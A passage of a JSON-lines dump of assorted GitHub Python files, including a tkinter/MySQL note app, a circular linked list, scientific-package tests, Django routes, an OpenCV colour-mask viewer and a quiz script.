self.playback_index < len(self.data['receive']):\n self._receiver(self.data['receive'][self.playback_index])\n self.playback_index += 1\n\n\nclass Recorder:\n def __init__(self):\n 
self.data = {Direction.SEND.value: [], Direction.RECEIVE.value: []}\n\n def record(self, direction: Direction, msg: object):\n self.data[direction.value].append(msg)\n\n\nclass ServerWrapper:\n\n class Mode(enum.Enum):\n PROD = 'prod'\n PROD_VERIFY = 'prod_verify'\n RECORD = 'record'\n PLAYBACK = 'playback'\n\n class WrapperReceiver:\n\n def __init__(self, server_wrapper):\n self._server_wrapper = server_wrapper\n self._receiver = None\n\n def set_receiver(self, receiver: Receiver):\n assert self._receiver is None\n self._receiver = receiver\n\n def __call__(self, msg: object):\n self._server_wrapper._process(Direction.RECEIVE, msg, self._receiver)\n\n def __init__(self, server: Server, mock_server: Server = None, recorder: Recorder = None):\n self._recorder = None\n if server is not None:\n self.mode = self.Mode.PROD\n self._server = server\n if recorder is not None:\n self.mode = self.Mode.RECORD\n self._recorder = recorder\n elif mock_server is not None:\n self.mode = self.Mode.PLAYBACK\n self._server = mock_server\n else:\n assert False\n\n self._receiver = self.WrapperReceiver(self)\n self._server.set_receiver(self._receiver)\n\n def set_receiver(self, receiver: Receiver):\n self._receiver.set_receiver(receiver)\n\n def send(self, msg: object):\n self._process(Direction.SEND, msg, self._server.send)\n\n def _process(self, direction: Direction, msg: object, receiver: Receiver):\n if self._recorder is not None:\n self._recorder.record(direction, msg)\n receiver(msg)\n\n\nclass ClassAttributeAccessError(Exception):\n pass\n\n\nclass MethodCallSerializer:\n\n def __init__(self, server, wrapped, namespace=''):\n self._server = server\n self._wrapped = wrapped\n self._namespace = namespace\n\n def __getattr__(self, attr):\n if attr[0] == '_':\n # private attributes are never proxied; fall back to normal lookup\n return super().__getattribute__(attr)\n\n value = getattr(self._wrapped, attr)\n if not callable(value) and not hasattr(self._wrapped.__class__, attr):\n raise ClassAttributeAccessError(attr)\n\n return MethodCallSerializer(self._server, value, attr)\n\n def __call__(self, *args, **kw):\n self._server.send((self._namespace, args, kw))\n\n\nclass MethodCallDeserializer(Server):\n\n def __init__(self, target):\n self._target = target\n\n def set_receiver(self, receiver):\n if (hasattr(self._target, 'set_receiver') and\n callable(self._target.set_receiver)):\n self._target.set_receiver(receiver)\n\n def send(self, msg):\n method, args, kw = msg\n getattr(self._target, method)(*args, **kw)\n","repo_name":"areusch/pyapi-mock","sub_path":"pyapi_mock/mock_channel.py","file_name":"mock_channel.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40503985051","text":"from datetime import date\nfrom tkinter import *\nfrom tkinter.ttk import *\nimport mysql.connector\n\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"admin\",\n database=\"notetaking\"\n)\n\nmycursor = mydb.cursor()\n\n# Create the main window\nmaster = Tk()\nmaster.title(\"Note Taking App\")\nmaster.geometry(\"600x700\")\n\n# Banner\nlabel=Label(master,text=\"THIS IS MAIN WINDOW\")\nlabel.pack(pady=10)\n\n\n# Adding a button to view saved notes\ndef view_notes(id):\n # parameterized query avoids SQL injection; id is unique, so one row comes back\n mycursor.execute(\"SELECT * FROM notes WHERE id = %s\", (id,))\n x = mycursor.fetchone()\n newWindow = Toplevel(master)\n newWindow.title(x[1])\n newWindow.geometry(\"300x300\")\n # note\n Label(newWindow, text=x[3], wraplength=200).pack()\n\n # Delete 
Note\n def delete_note(id):\n query = \"DELETE FROM notes WHERE id = %s\"\n mycursor.execute(query, (id,))\n mydb.commit()\n newWindow.destroy()\n view_master()\n delete_button = Button(newWindow, text=\"Delete\", command=lambda x = id: delete_note(x))\n delete_button.pack()\n\n # Buttons to see titles of notes\n\ndef view_master():\n mycursor.execute(\"SELECT * FROM notes\")\n myresult = mycursor.fetchall()\n for x in myresult:\n btn = Button(master, text =f\"{x[1]} | Category : {x[2]}\", command=lambda id=x[0]: view_notes(id)) # lambda function creates an anonymous function that takes the value of x[0] at the moment the button is created and then passes it to view_notes when the button is clicked.\n btn.pack(pady = 10)\n\n# Create a function to display the Add Note section\ndef display_add_note_section():\n add_note_window = Toplevel(master)\n add_note_window.title(\"Add Note\")\n add_note_window.geometry(\"300x300\")\n\n # Title Entry\n Label(add_note_window, text=\"Title:\").pack()\n title_entry = Entry(add_note_window)\n title_entry.pack()\n\n # Category Entry\n Label(add_note_window, text=\"Category:\").pack()\n category_entry = Entry(add_note_window)\n category_entry.pack()\n\n # Content Entry (use a Text widget for multi-line input)\n Label(add_note_window, text=\"Content:\").pack()\n content_entry = Text(add_note_window, height=10, width=30)\n content_entry.pack()\n\n # Add Note Button\n add_button = Button(add_note_window, text=\"Save!\", command=lambda: add_note(title_entry.get(), content_entry.get(\"1.0\", END), category_entry.get()))\n add_button.pack()\n view_master()\ndef add_note(title, content, category):\n today = date.today()\n print(\"Title:\", title)\n print(\"Category:\", category)\n print(\"Content:\", content)\n print(today)\n # Insert the new note into the database\n mycursor.execute(\"INSERT INTO notes (Title, Category, Context, Date) VALUES (%s, %s, %s, %s)\", (title, category, content, today))\n mydb.commit()\n # Clear the entry fields after adding the note\n view_master()\nadd_note_button = Button(master, text=\"Add Note\", command=display_add_note_section)\nadd_note_button.pack()\n\nviewNotesButton = Button(master, text=\"View Notes\", command=view_master)\nviewNotesButton.pack()\n\n\n# Run the application\nmaster.mainloop()\n\n","repo_name":"aberdayy/COMP2005","sub_path":"NoteTakingApp/deneme.py","file_name":"deneme.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9320046889","text":"from linked_list import LinkedList\nfrom node import Node\n\nfrom dataclasses import dataclass, field\n\n@dataclass\nclass CSLL(LinkedList):\n def __init__(self):\n self.head = None\n self.tail = None\n self.length = 0\n\n def __iter__(self):\n node = self.head\n while node:\n yield node\n if node.next == self.head:\n break\n node = node.next\n \n def __str__(self) -> str:\n nodes = '->'.join([str(node.value) for node in self]) if self.head else ''\n return f'CSLL({nodes})'\n\n def get(self, index):\n if index < -1 or index > self.length:\n raise Exception(\"Usage: Invalid Index\")\n if index == -1:\n return self.tail\n temp = self.head\n for _ in range(index):\n temp = temp.next\n return temp\n \n def set(self, index, node):\n if index < -1 or index > self.length:\n raise Exception(\"Usage: Invalid Index\")\n if index == -1:\n index = self.length -1\n temp = self.head\n for _ in range(index):\n temp = temp.next\n temp.value = node.value\n\n def prepend(self, node):\n if 
self.length == 0:\n node.next = node\n self.head = node\n self.tail = node\n else:\n self.tail.next = node\n node.next = self.head\n self.head = node\n self.length += 1\n\n def append(self, node):\n if self.length == 0:\n node.next = node\n self.head = node\n self.tail = node\n else:\n self.tail.next = node\n node.next = self.head\n self.tail = node\n self.length += 1\n \n def insert(self, node, index):\n if index < -1 or index > self.length:\n raise Exception('Invalid Index')\n elif index == 0:\n self.prepend(node)\n elif index == -1:\n self.append(node)\n else:\n curr = self.head\n for _ in range(index-1):\n curr = curr.next\n node.next = curr.next\n curr.next = node\n self.length += 1\n\n def create(self,*args):\n if len(args):\n for val in args:\n self.append(Node(val))\n\n def pop_first(self):\n if self.length == 0:\n raise Exception('Empty')\n temp = self.head\n if self.length == 1:\n self.head.next = None\n self.head = None\n self.tail = None\n else:\n self.tail.next = self.head.next\n self.head = self.tail.next\n temp.next = None\n self.length -= 1\n return temp\n\n def pop(self):\n if self.length == 0:\n raise Exception('Empty')\n temp = self.tail\n if self.length == 1:\n self.tail.next = None\n self.head.next = None\n self.head = None\n self.tail = None\n else:\n curr = self.head\n while curr.next != self.tail:\n curr = curr.next\n curr.next = self.tail.next\n self.tail = curr\n temp.next = None\n self.length -= 1\n return temp\n \n def remove(self, index):\n if index < -1 or index > self.length or self.length == 0:\n raise Exception('Invalid Index')\n elif index == 0:\n return self.pop_first()\n elif index == -1:\n return self.pop()\n else:\n curr = self.head\n for _ in range(index-1):\n curr = curr.next\n temp = curr.next\n curr.next = curr.next.next\n temp.next = None\n self.length -= 1\n return temp\n \n def reverse(self):\n # walk exactly length nodes; a circular list never yields None, so a\n # while-not-None loop would never terminate\n prev = self.tail\n curr = self.head\n for _ in range(self.length):\n next = curr.next\n curr.next = prev\n prev = curr\n curr = next\n self.head, self.tail = self.tail, self.head\n return self\n","repo_name":"gouherdanish/linked_list_concepts","sub_path":"csll.py","file_name":"csll.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24802589374","text":"MAX_CONTENT_LENGTH = 256 * 1024 * 1024 # default: 256M max upload to avoid filling the disk\nVIDEO_CONTENT_TYPES = [\"video/mp4\",\"video/webm\",\"video/x-matroska\"]\n\n# these paths are relative to the instance directory\nSQLITE_DATABASE = \"ati.db\"\nTITLE_VIDEO = \"title.mp4\"\n\n# relative to project root directory\nVIDEO_UPLOAD_DIR = \"media/original\"\nTEMP_DIR = \"media/tmp\"\n","repo_name":"wilhelmy/ati","sub_path":"default_settings.py","file_name":"default_settings.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25657988027","text":"from bmds.bmds3.constants import DistType\nfrom bmds.bmds3.models import continuous\n\n\nclass TestContinuousGof:\n def test_collapse(self, cdataset, cidataset):\n # goodness of fit should collapse into non-zero fields\n\n # continuous summary data already collapsed; no change in length of table\n model = continuous.Power(cdataset)\n res = model.execute()\n assert res.gof.n() == cdataset.num_dose_groups == 5\n assert res.gof.n() == len(cdataset.doses) == 5\n\n # continuous individual summary data collapses appropriately\n model = 
continuous.Power(cidataset)\n res = model.execute()\n assert res.gof.n() == cidataset.num_dose_groups == 7\n assert res.gof.n() == len(cidataset.doses)\n assert res.gof.n() < len(cidataset.individual_doses)\n assert res.gof.n() == len(set(cidataset.individual_doses))\n\n\nclass TestContinuousParameters:\n def test_exp3(self, cdataset):\n \"\"\"\n Edge case for exp3 - the dll expects a prior for the c parameter, but the\n returned output effectively drops the c array and shifts all other values down one.\n We check that the input and output values are shifted as required.\n \"\"\"\n model = continuous.ExponentialM3(cdataset)\n res = model.execute()\n # param names for prior are as expected\n assert model.get_param_names() == [\"a\", \"b\", \"c\", \"d\", \"log-alpha\"]\n # but outputs have been shifted\n assert res.parameters.names == [\"a\", \"b\", \"d\", \"log-alpha\"]\n\n model = continuous.ExponentialM3(cdataset, settings=dict(disttype=DistType.normal_ncv))\n res = model.execute()\n # param names for prior are as expected\n assert model.get_param_names() == [\"a\", \"b\", \"c\", \"d\", \"rho\", \"log-alpha\"]\n # but outputs have been shifted\n assert res.parameters.names == [\"a\", \"b\", \"d\", \"rho\", \"log-alpha\"]\n\n # confirm arrays all the same length after changes\n params = res.parameters\n n_params = len(params.names)\n for field in [\n \"values\",\n \"se\",\n \"lower_ci\",\n \"upper_ci\",\n \"bounded\",\n \"prior_type\",\n \"prior_initial_value\",\n \"prior_stdev\",\n \"prior_min_value\",\n \"prior_max_value\",\n ]:\n assert getattr(params, field).size == n_params\n assert params.cov.shape == (n_params, n_params)\n","repo_name":"shapiromatron/bmds","sub_path":"tests/bmds3/types/test_continuous.py","file_name":"test_continuous.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"25657988027","text":"import os\nimport shutil\nimport sys\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom os.path import dirname, join, exists, isfile, splitext, basename, isdir, relpath, getsize, getmtime\nfrom targqc.utilz.testing import BaseTestCase, info, check_call, swap_output\n\n\nONLY_DIFF=False\n\n\nclass BaseTargQC(BaseTestCase):\n script = 'targqc'\n\n data_dir = join(dirname(__file__), BaseTestCase.data_dir)\n results_dir = join(dirname(__file__), BaseTestCase.results_dir)\n gold_standard_dir = join(join(dirname(__file__), BaseTestCase.gold_standard_dir))\n\n Sample = namedtuple('Sample', 'name bam l_fastq r_fastq')\n samples = [\n Sample('syn3-tumor', 'syn3-tumor.bam', 'syn3-tumor_R1.fq.gz', 'syn3-tumor_R2.fq.gz'),\n Sample('syn3-normal', 'syn3-normal.bam', 'syn3-normal_R1.fq.gz', 'syn3-normal_R2.fq.gz'),\n ]\n\n bwa_dir = join(data_dir, 'bwa')\n bwa_path = join(bwa_dir, 'hg19-chr21.fa')\n\n def setUp(self):\n BaseTestCase.setUp(self)\n\n self.syn3_dir = join(BaseTargQC.data_dir, 'chr21_az300')\n self.bed3 = join(self.syn3_dir, 'NGv3.chr21.3col.bed')\n self.bed4 = join(self.syn3_dir, 'NGv3.chr21.4col.bed')\n self.bams = [join(self.syn3_dir, s.bam) for s in BaseTargQC.samples]\n self.fastqs = [join(self.syn3_dir, s.l_fastq) for s in BaseTargQC.samples] + \\\n [join(self.syn3_dir, s.r_fastq) for s in BaseTargQC.samples]\n\n if not isdir(self.syn3_dir):\n info(self.syn3_dir + ' does not exist, downloading test data')\n cur_dir = os.getcwd()\n os.chdir(self.data_dir)\n check_call(['wget', self.syn3_url])\n check_call(['tar', '-xzvf', basename(self.syn3_url)])\n 
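# return to the original working directory now that the test data is unpacked\n            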
os.chdir(cur_dir)\n\n def _test(self, output_dirname=None, used_samples=samples, bams=None, fastq=None, bed=None,\n debug=True, reuse_intermediate=False, reuse_output_dir=False, reannotate=False,\n genome='hg19-chr21', bwa=None, threads=None, ipython=None, keep_work_dir=True):\n os.chdir(self.results_dir)\n cmdl = [self.script]\n output_dir = None\n if output_dirname:\n output_dir = join(self.results_dir, output_dirname)\n cmdl.extend(['-o', output_dir])\n if bams: cmdl.extend(bams)\n if fastq: cmdl.extend(fastq)\n if bed: cmdl.extend(['--bed', bed])\n if debug: cmdl.append('--debug')\n if reuse_intermediate:\n reuse_output_dir = True\n cmdl.append('--reuse')\n if reannotate: cmdl.append('--reannotate')\n if genome:\n cmdl.extend(['-g', genome])\n if bwa:\n cmdl.extend(['--bwa', bwa])\n if threads: cmdl.extend(['-t', str(threads)])\n if ipython: cmdl.extend('-s sge -q queue -r pename=smp -r --local'.split())\n if keep_work_dir: cmdl.append('--keep-work-dir')\n\n output_dir = output_dir or self._default_output_dir()\n\n if not ONLY_DIFF:\n if reuse_output_dir is False:\n swap_output(output_dir)\n\n info('-' * 100)\n check_call(cmdl)\n info('-' * 100)\n info('')\n\n self._check_results(output_dir, used_samples)\n\n if not ONLY_DIFF and self.remove_work_dir_on_success and not reuse_intermediate and not reuse_output_dir:\n work_dir = join(output_dir, 'work')\n if not isdir(work_dir):\n info('Work dir for run ' + output_dirname + ' does not exist under ' + work_dir)\n else:\n shutil.rmtree(work_dir)\n info('')\n\n @staticmethod\n def _default_output_dir():\n return join(os.getcwd(), 'targqc')\n\n def _check_results(self, output_dir, used_samples):\n assert isdir(output_dir)\n self._check_file_throws(join(output_dir, 'regions.tsv'), wrapper='wc -l')\n self._check_file_throws(join(output_dir, 'summary.tsv'), wrapper='wc -l')\n self._check_file_throws(join(output_dir, 'summary.html'), ignore_matching_lines='report_date', check_diff=False)\n for s in used_samples:\n s_dir = join(output_dir, s.name)\n assert isdir(s_dir)\n self._check_file_throws(join(s_dir, 'regions.tsv'), wrapper='wc -l')\n self._check_file_throws(join(s_dir, 'summary.txt'), wrapper='wc -l')\n self._check_file_throws(join(s_dir, 'summary.html'), ignore_matching_lines='report_date', check_diff=False)\n self._check_file_throws(join(s_dir, 'summary.json'), ignore_matching_lines='work_dir', check_diff=False)\n","repo_name":"vladsavelyev/TargQC","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"38991107349","text":"#!/usr/bin/python\n\n\"\"\"\nPractical 2 ISBC\n\nExercise 8\n\nIn this exercise, we store events in variables\n\nAuthor: Marcos Rivera Gavilan\nWebsite: https://www.uco.es/~i92rigam/\n\nImportant: To reduce the number of comments\nand simplify reading, I will only comment on the functions\nthat are new to this exercise. 
Any that appear without\ncomments were already commented in previous exercises.\n\"\"\"\n\nimport sys\nfrom PyQt5.QtWidgets import QMainWindow, QPushButton, QApplication\n\n\nclass Example(QMainWindow):\n\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n btn1 = QPushButton(\"Button 1\", self)\n btn1.move(30, 50)\n\n btn2 = QPushButton(\"Button 2\", self)\n btn2.move(150, 50)\n\n btn1.clicked.connect(self.buttonClicked)\n btn2.clicked.connect(self.buttonClicked)\n\n \"\"\"\n Here we connect the buttons to the slot\n \"\"\"\n\n self.statusBar()\n\n self.setGeometry(300, 300, 450, 350)\n self.setWindowTitle('Event sender')\n self.show()\n\n def buttonClicked(self):\n sender = self.sender()\n self.statusBar().showMessage(sender.text() + ' was pressed')\n\n \"\"\"\n With this function we update the status bar message\n \"\"\"\n\n\ndef main():\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MarcosRigal/Issbc","sub_path":"P2/E8.py","file_name":"E8.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39199891875","text":"from mongoengine import QuerySet\nimport requests\nfrom bson.objectid import ObjectId\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom dateutil.parser import isoparse\nfrom datetime import timezone\nfrom utils.querystring import querystring\n\n# This file contains querysets\n# What are querysets\n# When querying the models, you do\n# ModelName.objects({\n# field_1: value_1\n# .\n# .\n# field_n: value_n\n# })\n# A queryset is shorthand for this. You define a method called e.g. custom_query_1\n# And now you can execute ModelName.objects.custom_query_1\n# The api supports calling a queryset directly via\n# GET /api/ModelName?$queryset=custom_query_1\n\n\ndef get(query):\n result = requests.get(\"http://localhost:5000/api/{}\".format(query))\n return result.json()\n\n\nclass RatesQuerySet(QuerySet):\n def default(self, cls, filters):\n rates = cls.fetch(filters)\n\n return rates\n\n def minimum(self, cls, filters):\n result = next(\n cls.objects().aggregate(\n [\n {\n \"$match\": {\n \"experienceId\": ObjectId(filters.get(\"experienceId\")),\n \"availableDates\": {\n \"$elemMatch\": {\n \"time\": {\n \"$lte\": datetime.now() + timedelta(days=60)\n }\n }\n },\n }\n },\n {\"$unwind\": \"$rateTypesPrices\"},\n {\"$sort\": {\"rateTypesPrices.retailPrice.amount\": 1}},\n {\"$limit\": 1},\n ]\n ),\n None,\n )\n\n return result\n\n def query_by_experience(self, cls, query):\n return requests.get(\"http://localhost:5000/api/rates?{}\".format(query)).json()\n\n def fetch(self, cls, filters):\n return cls.fetch(filters)\n\n\nclass ExperiencesQuerySet(QuerySet):\n def default(self, cls, filters):\n # These can be passed to include rates\n fromDate = filters.pop(\"from\", None)\n untilDate = filters.pop(\"until\", None)\n limit = filters.pop(\"$limit\", None)\n skip = filters.pop(\"$skip\", None)\n\n experiences = cls.fetch(filters)\n\n for experience in experiences:\n minimumRate = requests.get(\n \"http://localhost:5000/api/rates?$queryset=minimum&experienceId={}&dateRange__fromDate__lte={}\".format(\n experience[\"id\"], (datetime.now() + timedelta(days=60)).isoformat()\n )\n )\n\n minimumRate = minimumRate.json()\n\n if minimumRate:\n experience[\"minPrice\"] = minimumRate.get(\"rateTypesPrices\", [{}])[\n 0\n ].get(\"retailPrice\", {})\n\n 
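# assemble the query for this experience's rate calendar\n            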
query_string = {\"$queryset\": \"fetch\", \"experienceId\": experience[\"id\"]}\n\n if fromDate and untilDate:\n query_string.update(\n {\n \"availableDates__time__gte\": fromDate,\n \"availableDates__time__lte\": untilDate,\n }\n )\n\n rates = requests.get(\n querystring(\"http://localhost:5000/api/rates\", query_string)\n )\n experience.update({\"rateCalendar\": rates.json()})\n\n if fromDate and untilDate:\n experiences = list(\n filter(lambda x: any(x.get(\"rateCalendar\", [])), experiences)\n )\n\n if skip:\n experiences = experiences[int(skip) :]\n\n if limit:\n experiences = experiences[: int(limit)]\n\n return experiences\n\n def fetch(self, cls, filters):\n return cls.fetch(filters)\n\n\nclass BookingsQuerySet(QuerySet):\n def default(self, cls, filters):\n bookings = cls.fetch(filters)\n\n rates = cls.rateId.document_type_obj.fetch(\n {\"id__in\": list(set([x[\"rateId\"] for x in bookings]))}\n )\n\n experiences = cls.rateId.document_type_obj.experienceId.document_type_obj.fetch(\n {\"id__in\": list(set([x[\"experienceId\"] for x in rates]))}\n )\n\n for booking in bookings:\n rate = next(filter(lambda x: x[\"id\"] == booking[\"rateId\"], rates))\n experience = next(\n filter(lambda x: x[\"id\"] == rate[\"experienceId\"], experiences)\n )\n date = next(\n filter(\n lambda x: x[\"availabilityId\"] == booking[\"availabilityId\"],\n rate[\"availableDates\"],\n ),\n None,\n )\n\n booking[\"ratesBooked\"] = {\n \"rateId\": booking[\"rateId\"],\n \"start\": isoparse(date.get(\"time\", {}).get(\"$date\")),\n \"ratesQuantity\": booking[\"ratesQuantity\"],\n }\n\n booking[\"experience\"] = experience\n\n booking[\"price\"] = {\n \"finalRetailPrice\": {\"amount\": 0, \"currency\": \"EUR\"},\n \"retailPriceBreakdown\": [],\n }\n\n for item in booking[\"ratesQuantity\"]:\n price = next(\n filter(\n lambda x: item[\"rateType\"] == x[\"rateType\"],\n rate[\"rateTypesPrices\"],\n )\n )\n booking[\"price\"][\"retailPriceBreakdown\"].append(\n {**price, \"quantity\": item[\"quantity\"]}\n )\n booking[\"price\"][\"finalRetailPrice\"][\"amount\"] += (\n price.get(\"retailPrice\", {}).get(\"amount\")\n ) * item[\"quantity\"]\n\n booking[\"cancellationFee\"] = {\n \"amount\": booking[\"price\"][\"finalRetailPrice\"][\"amount\"]\n if (booking[\"ratesBooked\"][\"start\"] - datetime.now(timezone.utc)).days\n else 0,\n \"currency\": booking[\"price\"][\"finalRetailPrice\"][\"currency\"],\n }\n\n booking[\"bookingCreated\"] = ObjectId(booking[\"id\"]).generation_time\n booking[\"start\"] = booking[\"ratesBooked\"][\"start\"]\n\n return bookings\n","repo_name":"isebarn/turneo","sub_path":"models/query_sets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22273782415","text":"from pathlib import Path\n\nfrom sqlmodel import create_engine, SQLModel, Session\n\nfrom app.model import create_all\n\n\nBaseDir = Path(__file__).resolve().parent.parent\n\n\nsqlite_file_name = 'database.db'\nsqlite_url = f'sqlite:///{BaseDir}/{sqlite_file_name}'\n\nengine = create_engine(sqlite_url, echo=True)\n\n\ndef create_db_and_tables():\n create_all()\n SQLModel.metadata.create_all(engine)\n\n\ndef get_session() -> Session:\n session = Session(engine)\n try:\n yield session\n finally:\n 
session.close()\n","repo_name":"alexg0mel/time_control","sub_path":"app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30097905661","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('login', views.login, name='login'),\n path('store/all', views.get_stores_all, name='getAllStores'),\n path('store/', views.get_store_infos, name='getStoreInfos'),\n path('category/all', views.get_categories_all, name='getAllCategories'),\n path('me/points',views.getAllFidelityPoints, name='getAllFidelityPoints'),\n path('me/points/',views.getFidelityPoints, name='getFidelityPoints'),\n path('client/points',views.getPointsForClient, name='getPointsForClient'),\n path('products/', views.get_store_products, name='getStoreProducts'),\n path('me/products/add', views.add_product_to_store, name='addProductToStore'),\n path('me/products/update', views.update_product, name='updateProduct'),\n path('me/products/remove', views.remove_product_from_store, name='removeProductFromStore'),\n path('transaction/credit', views.credit, name='credit'),\n path('transaction/debit', views.debit, name='debit'),\n path('me/qrcode', views.generateQRCode, name='generateQRCode'),\n path('productmodels',views.getAllProductModels, name='getAllProductModels'),\n path('me/records',views.getPurchaseRecords, name='getPurchaseRecords'),\n path('me/update',views.updateInfo, name='updateInfo'),\n\n]\n","repo_name":"lorettet/Smart","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19549030219","text":"import os\nimport configparser\nimport codecs\n\nlist_folder = os.listdir(os.getcwd())\n\nconfig = configparser.ConfigParser()\nconfig.read(os.getcwd() + \"/config.ini\")\n\nsearchCharacter = config['find']['character']\nreplaceCharacter = config['replace']['character']\nreplaceCharacter = codecs.decode(replaceCharacter, \"unicode-escape\")\n\nfor f in list_folder:\n base_file, ext = os.path.splitext(f)\n if ext != \".py\":\n if ext != \".exe\":\n if ext != \".ini\":\n with open(f, \"r\") as inputfile:\n newText = inputfile.read().replace(searchCharacter, replaceCharacter)\n\n with open(f, \"w\") as outputfile:\n outputfile.write(newText)\n os.rename(f, f + '.txt')\n\n","repo_name":"eldadpuzach/MyPythonProjects","sub_path":"Replace_String_with_Enter/replaceApostropheWithCRLF.py","file_name":"replaceApostropheWithCRLF.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13343977715","text":"import numpy as np\nimport cv2\n\n\nclass ShowImage(object):\n def __init__(self, frame, kernel):\n self.frame = frame\n self.kernel = kernel\n self.hsv = cv2.cvtColor(self.frame, cv2.COLOR_BGR2HSV)\n self.mask_blue = cv2.inRange(self.hsv, np.array([96, 0, 0]), np.array([118, 255, 255]))\n self.mask_green = cv2.inRange(self.hsv, np.array([52, 0, 0]), np.array([89, 255, 243]))\n self.mask_yellow = cv2.inRange(self.hsv, np.array([0, 125, 201]), np.array([35, 255, 255]))\n\n def show_image(self):\n self._completion_all_mask()\n mask = cv2.inRange(self.hsv, np.array([0, 0, 77]), np.array([0, 0, 255]))\n opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)\n closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, 
self.kernel)\n\n        cv2.imshow(\"yellow\", self.mask_yellow)\n        cv2.imshow(\"blue_dots\", self.mask_blue)\n        cv2.imshow(\"green\", self.mask_green)\n        cv2.imshow(\"walls\", closing)\n        cv2.imshow(\"frame\", self.frame)\n        cv2.waitKey(3)\n\n    def _completion_all_mask(self):\n        self._completion_mask(self.mask_blue)\n        self._completion_mask(self.mask_green)\n        self._completion_mask(self.mask_yellow)\n\n    def _completion_mask(self, mask):\n        # assumed OpenCV 3.x API (returns image, contours, hierarchy); the original line lost the findContours call\n        _, contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n        self._completion_frame(contours, 0, 255, 0)\n\n    def _completion_frame(self, contours, r, g, b):\n        for i in range(len(contours)):\n            area = cv2.contourArea(contours[i])\n            if area > 5:\n                x, y, w, h = cv2.boundingRect(contours[i])\n                self.frame = cv2.rectangle(self.frame, (x, y), (x + w, y + h), (r, g, b), 2)\n","repo_name":"Andryxa797/AlgoritmFindPuth","sub_path":"ShowImage.py","file_name":"ShowImage.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"3245873563","text":"from django import template\nfrom django.utils.safestring import mark_safe\nfrom django.utils.html import conditional_escape\n\nimport re\nregister = template.Library()\n\n\n@register.filter()\ndef make_link(value, arg=14):\n    value = conditional_escape(value)\n    output = ''\n    for i in value.split(' '):\n        if i.startswith(('http://', 'www.', 'https://')):\n            output += '<a href=\"{href}\">link</a> '.format(href=i, ts=arg)\n        else:\n            output += i + ' '\n    return mark_safe(output)\n","repo_name":"pm-str/Sked","sub_path":"app/home/templatetags/customs.py","file_name":"customs.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"1647534830","text":"#!/usr/bin/env python3\nimport sys\nimport json\nimport random\n\ndef get_questions():\n    questions_file = open('./quiz.json')\n    questions_obj = json.load(questions_file)\n    questions_file.close()\n    return questions_obj['questions']\n\ndef print_choices(choices):\n    # enumerate() is used to\n    # extract index value from the list\n    for index, choice in enumerate(choices):\n        print(choice)\n        print('{}.{}'.format(index + 1, choice), '\\n')\n\ndef is_correct(ans, user_answer):\n    return ans == str(user_answer)\n\ndef get_greeting_msg(points, total_qns):\n    ans_percentage = int((points / total_qns) * 100)\n    result_msg = 'You got {} / {} questions!'.format(points, total_qns)\n    if ans_percentage <= 25:\n        return 'Not so impressive.😟 ' + result_msg\n    elif ans_percentage <= 75:\n        return result_msg + ' Almost! Rewatch probably? 
🙄'\n    else:\n        return result_msg + ' TRUE GOT HEAD 🍺'\n\ndef start_quiz():\n    questions = get_questions()\n    points = 0\n    for index, val in enumerate(questions):\n        print(val['question'], '\\n') # Question\n        print_choices(val['options'])\n        answer = input('Your answer(in number)?\\n')\n        if is_correct(answer, val['answer']):\n            print('✓')\n            points += 1\n        else:\n            print('✘')\n    print(get_greeting_msg(points, len(questions)))\n\nif __name__ == '__main__':\n    canPlay = input('Press y/Y to play the Game of Thrones quiz 🦁\\n')\n    canPlay = str(canPlay) == 'y' or str(canPlay) == 'Y'\n    start_quiz() if canPlay else exit(-1)","repo_name":"existentialcoder/I-Learn-Python","sub_path":"gameofthrones_quiz/quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
